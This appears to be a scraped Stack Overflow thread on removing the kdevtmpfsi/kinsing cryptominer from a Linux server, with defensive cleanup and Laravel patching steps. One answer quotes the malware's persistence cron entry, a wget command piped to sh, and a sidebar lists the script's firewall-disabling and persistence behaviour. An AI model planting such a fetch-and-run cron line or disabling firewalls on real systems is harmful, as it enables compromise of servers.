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kdevtmpfsi using the entire CPU [closed]

We are using an EC2(Ubuntu) amazon instance for running Apache.Recently we noticed that there is a process using the entire CPU.

enter image description here

We removed it using the help of the following procedure

[root@hadoop002 tmp]# systemctl status 25177 ● session-5772.scope - Session 5772 of user root    Loaded: loaded (/run/systemd/system/session-5772.scope; static; vendor preset: disabled)   Drop-In: /run/systemd/system/session-5772.scope.d            └─50-After-systemd-logind\x2eservice.conf, 50-After-systemd-user-sessions\x2eservice.conf, 50-Description.conf, 50-SendSIGHUP.conf, 50-Slice.conf, 50-TasksMax.conf    Active: active (abandoned) since Wed 2020-01-22 16:06:01 CST; 1h 21min ago    CGroup: /user.slice/user-0.slice/session-5772.scope            ├─19331 /var/tmp/kinsing            └─25177 /tmp/kdevtmpfsi  Jan 22 16:06:17 hadoop002 crontab[19353]: (root) REPLACE (root) Jan 22 16:06:17 hadoop002 crontab[19354]: (root) LIST (root) Jan 22 16:06:17 hadoop002 crontab[19366]: (root) LIST (root) Jan 22 16:06:17 hadoop002 crontab[19374]: (root) REPLACE (root) Jan 22 16:06:17 hadoop002 crontab[19375]: (root) LIST (root) Jan 22 16:06:17 hadoop002 crontab[19383]: (root) REPLACE (root) Jan 22 16:06:17 hadoop002 crontab[19389]: (root) REPLACE (root) Jan 22 16:06:17 hadoop002 crontab[19390]: (root) LIST (root) Jan 22 16:06:17 hadoop002 crontab[19392]: (root) REPLACE (root) Jan 22 16:06:17 hadoop002 crontab[19393]: (root) LIST (root) [root@hadoop002 tmp]# ps -ef|grep kinsing root     19331     1  0 16:06 ?        00:00:04 /var/tmp/kinsing root     25190 23274  0 17:27 pts/0    00:00:00 grep --color=auto kinsing [root@hadoop002 tmp]# ps -ef|grep kdevtmpfsi root     25177     1 99 17:27 ?        00:01:47 /tmp/kdevtmpfsi root     25197 23274  0 17:28 pts/0    00:00:00 grep --color=auto kdevtmpfsi [root@hadoop002 tmp]# kill -9 19331 [root@hadoop002 tmp]# kill -9 25177 [root@hadoop002 tmp]# rm -rf kdevtmpfsi [root@hadoop002 tmp]# cd /var/tmp/ [root@hadoop002 tmp]# ll total 16692 -rw-r--r-- 1 root root        0 Jan 13 19:45 aliyun_assist_update.lock -rwxr-xr-x 1 root root    13176 Dec 20 02:14 for -rwxr-xr-x 1 root root 17072128 Jan 19 17:43 kinsing drwx------ 3 root root     4096 Jan 13 19:50 systemd-private-f3342ea6023044bda27f0261d2582ea3-chronyd.service-O7aPIg [root@hadoop002 tmp]# rm -rf kinsing 

But after a few minutes, It again started automatically. Anyone know how to fix this?

like image 814
Shijin TR Avatar asked Feb 10 '20 13:02

Shijin TR

People also ask

What is Kdevtmpfsi process?

The malware is running a linux process in the background: kdevtmpfsi, which is occupying server processor and memory. The main purpose of the virus is to set up a cryptocurrency miner. It seems that container environment attacks have been on the rise recently, with a huge spike in the number of cases in March 2020.

What is Kinsing malware?

The kinsing malware has a script which is executed after being pulled from the host server. This script does the following: Disables iptables and ufw firewalls. Disables the Non-Maskable Interrupt (NMI) watchdog feature. Installs curl, wget or cron if not installed already to help with persistence later.

2 Answers

I had the same issue with Laravel in Centos 8, This is the steps I followed to remove the malware and patch the system.

Removing the malware from system steps: Step 1:

Remove the malware:
Kill the two process (kdevtmpfsi and kinsing -They can be in the same name but with random characters at the end-) using htop or any other process manager.

htop F3 to search services kdevtmpfsi And kinsing

Use the following to find and delete the files:

# find / -iname kdevtmpfsi* -exec rm -fv {} \; # find / -iname kinsing* -exec rm -fv {} \; 

The output should look like:

removed '/tmp/kdevtmpfsi962782589' removed '/tmp/kdevtmpfsi' removed '/tmp/kinsing' removed '/tmp/kinsing_oA1GECLm' 

Step 2:

Check for a cron job:
check if there is a cron job that would reinitialized the malware.
I found mine in: /var/spool/cron/apache >

UBUNTU /var/spool/cron/crontabs/www-data

It included the following :
* * * * * wget -q -O - | sh > /dev/null 2>&1

Step 3:

Make new files and make them readonly:

# touch /tmp/kdevtmpfsi && touch /tmp/kinsing # echo "kdevtmpfsi is fine now" > /tmp/kdevtmpfsi # echo "kinsing is fine now" > /tmp/kinsing # chmod 0444 /tmp/kdevtmpfsi # chmod 0444 /tmp/kinsing 

Patching Laravel project: Step 1:

Turn off APP_DEBUG:
make sure that the APP_DEBUG attribute is false in .env because that's how the vulnerability gets access.

Step 2:

Update ignition:
Update ignition to a version higher than 2.5.1 to make sure the vulnerability is patched.
run the following in your project folder:

$ composer update facade/ignition 
like image 97
Zacktamondo Avatar answered Nov 01 '22 09:11


The solution mentioned here worked for us. You basically create the files the miner uses, without any rights, so the miner cannot create and use them. https://github.com/docker-library/redis/issues/217

touch /tmp/kdevtmpfsi && touch /var/tmp/kinsing  echo "everything is good here" > /tmp/kdevtmpfsi  echo "everything is good here" > /var/tmp/kinsing  touch /tmp/zzz  echo "everything is good here" > /tmp/zzz  chmod go-rwx /var/tmp  chmod 1777 /tmp 
like image 37
Husein Avatar answered Nov 01 '22 10:11
